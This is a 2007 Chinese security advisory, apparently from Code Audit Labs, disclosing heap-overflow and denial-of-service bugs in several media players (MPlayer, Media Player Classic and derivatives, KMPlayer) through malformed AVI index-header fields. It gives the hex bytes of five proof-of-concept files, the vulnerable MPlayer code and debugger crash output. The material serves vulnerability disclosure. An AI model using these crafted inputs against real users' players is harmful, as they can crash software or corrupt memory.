用AVI文件三个字段来测试各播放器的代码审计小报告
来源:安全焦点
作者:CodeAuditLabs (vulnhunt_at_gmail.com)
用AVI文件三个字段来测试各播放器的代码审计小报告
— CAL-20070912-1 多家厂家播放器处理AVI文件漏洞
摘要
====
安全的代码是很难编写的,不安全的代码是到处可见的.我们是代码审计实验室
(Code Audit Labs http://www.vulnhunt.com/),"安全您的代码,保护您的价值"。
我们用AVI文件三个字段测试了下主要的播放器,构造了五个测试用例,结果发现:
MPlayer有一个heap溢出漏洞,media player classic,影音风暴 mympc,StormPlayer
有三个heap溢出,这些漏洞可能导致用户在打开一个畸形的AVI文件的时候代码任意
执行,从而导致被人控制您的系统和机器,可能导致您电脑上重要数据破坏或者丢失。
KMPlayer有三个D.o.S ,触使cpu 100%
Original LINK:
==============
http://www.vulnhunt.com/advisories/CAL-20070912-1_Multiple_vendor_produce_handling_AVI_file_vulnerabilities_cn.txt
字段使用
========
该报告中,我们使用了AVI 文件头中的以下三个字段
1) indx_truck_size
2) wLongsPerEntry 每个入口的大小
3) nEntriesInuse 多少个入口
主流的媒体播放器
===============
我们选取了一些比较流行的媒体播放器
1: Windows Media Player (wmp)
2: MPlayer 1.0rc1 (svn 20070729)
3: KMPlayer v2.9.3.1210
4: media player classic v6.4.9.0 (mpc)
5: 影音风暴 mympc 1.0.0.1 (base on mpc)
6: StormPlayer 1.0.4 (base on mpc)
7: x影音 xplayer 2.3 (base on mpc and mplayer)
构造我们的test case
==================
test case 1 (new_avihead_poc1.avi)
===============================================
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
===============================================
test case 2 (new_avihead_poc2.avi)
===============================================
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
===============================================
test case 3 (new_avihead_poc3.avi)
===============================================
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
===============================================
test case 4 (new_avihead_poc4.avi)
===============================================
69 6E 64 78 00 FF 00 00 01 00 64 73 20 00 00 10
indx truck size 0x0000ff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
===============================================
test case 5 (new_avihead_poc5.avi)
===============================================
69 6E 64 78 00 FF 00 00 04 00 64 73 10 00 00 40
indx truck size 0x0000ff00
wLongsPerEntry 0x0004
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x40000010
===============================================
测试结果
========
+———+———–+———–+———–+———–+———-+
| 产品 | testcase1 | testcase2 | testcase3 | testcase4 |testcase5 |
+———+———–+———–+———–+———–+———-+
| wmp | ok | ok | ok | ok | ok |
+———+———–+———–+———–+———–+———-+
| mplayer | ok | ok | HO/CRASH | ok | ok |
+———+———–+———–+———–+———–+———-+
| mpc | HO | HO | HO | ok | ok |
+———+———–+———–+———–+———–+———-+
|KMPlayer | RAISE CPU | RAISE CPU | RAISE CPU | ok | ok |
+———+———–+———–+———–+———–+———-+
| mympc | HO | HO | HO | ok | ok |
+———+———–+———–+———–+———–+———-+
|StormPlay| HO | HO | HO | ok | ok |
+———+———–+———–+———–+———–+———-+
| xplayer | ok | ok | ok | ok | ok |
+———+———–+———–+———–+———–+———-+
说明:
HO 是 Heap Overflow的缩写
SO 是 Stack Overflow的缩写
BO 是 Buffer Overflow的缩写,是HO,SO的统称
CRASH是指crash掉应用程序
ok 是指测试没有问题
RAISE CUP是指使CPU高负荷,1000%。
这里值得一提的是,xplayer是基于mpc和mplayer的播放器,在他们上面有的漏洞
在xplayer上居然没有被触发。
简单漏洞分析
============
========================================
testcase3 for Mplayer 漏洞分析
从代码里我们可以看到
vulnerability code in libmpdemux/aviheader.c:
232 print_avisuperindex_chunk(s,MSGL_V);
233
234 if( ((chunksize/4)/s->wLongsPerEntry) < s->nEntriesInUse){
235 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index chunk\n");
236 s->nEntriesInUse = (chunksize/4)/s->wLongsPerEntry;
237 }
238
239 // Check and fix this useless crap
240 if(s->wLongsPerEntry != sizeof (avisuperindex_entry)/4) {
241 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index chunk size: %u\n",s->wLongsPerEntry);
242 s->wLongsPerEntry = sizeof(avisuperindex_entry)/4;
243 }
244 s->aIndex = calloc(s->nEntriesInUse, sizeof (avisuperindex_entry));
245 s->stdidx = calloc(s->nEntriesInUse, sizeof (avistdindex_chunk));
246
247 // now the real index of indices
248 for (i=0; i<s->nEntriesInUse; i++) {
249 chunksize-=16;
这个比较有趣,上面不正确的检查顺序,依然能使s->nEntriesInUse * sizeof (avisuperindex_entry)
导致一个32位整型的溢出,从而触发heap破坏。
上述代码可以提炼成一个简单的例子
calloc(0x10000001, 0x10);
上述这个calloc代码
1: 在winxp 或者 是glibc 2.5 上将返回NULL,这种情况下将形成一个空指针引用。
2: 在win2000 sp4 或者是 glibc < 2.5 (或者更前)上返回0x10大小的heap,这样情况下将导致heap腐烂。
0:000> g
(54c.284): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a7e740 ebx=024eecb8 ecx=00000000 edx=01414930 esi=ffffff00 edi=ffffff00
eip=0053b084 esp=0022e5e0 ebp=0000b6d0 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00200286
gmplayer+0x13b084:
0053b084 89741500 mov [ebp+edx],esi ss:0023:01420000=02cc1b9e
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0000b6d0 00000000 00000000 00000000 00000000 gmplayer+0x13b084
========================================
testcase1 for mpc 漏洞分析
(270.198): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=060fa8b0 ebx=060ff000 ecx=00000011 edx=00000000 esi=060fa86c edi=060ff000
eip=006b8a4a esp=05a3f1e8 ebp=05a3f1f0 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
*** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\xx\桌面\mpc2kxp6490\mplayerc.exe
mplayerc+0x2b8a4a:
006b8a4a f3a5 rep movsd ds:060fa86c=73640001 es:060ff000=????????
0:003> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
05a3f1f0 005a02d6 060ff000 060fa86c 00000044 mplayerc+0x2b8a4a
00000000 00000000 00000000 00000000 00000000 mplayerc+0x1a02d6
========================================
testcase2 testcase3 for mpc 漏洞分析
VERIFIER STOP 00000004: pid 0x870: extreme size request
029B0000 : Heap handle
FFFFFF08 : Size requested
00000000 :
00000000 :
(870.a88): Break instruction exception – code 80000003 (first chance)
eax=00000000 ebx=ffffff08 ecx=7c93eb05 edx=05a3ea68 esi=00000004 edi=029b0000
eip=7c921230 esp=05a3ec9c ebp=05a3ecb0 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
7c921230 cc int 3
testcase2和testcase3情况一样,假设indx truck size 是 indx_truck_size,
代码就象下面那样:
buf =malloc(indx_truck_size+8)
将会触发整型溢出,从而导致heap腐烂。
DISCLOSURE TIMELINE:
====================
1: 2007-07-30 notice MPlayer vendor
2: 2007-07-31 the vendor reply
3: 2007-09-12 release this report
关于我们:
=========
代码审计实验室(Code Audit Labs)致力于自动化代码审计(包括源代码和二进制代码)
研究和开发,为提高软件安全测试的效率以及软件代码质量不懈努力.
Code Audit Labs信念: "您为客户创造价值,我们保护您创造的价值。"
http://www.VulnHunt.com
EOF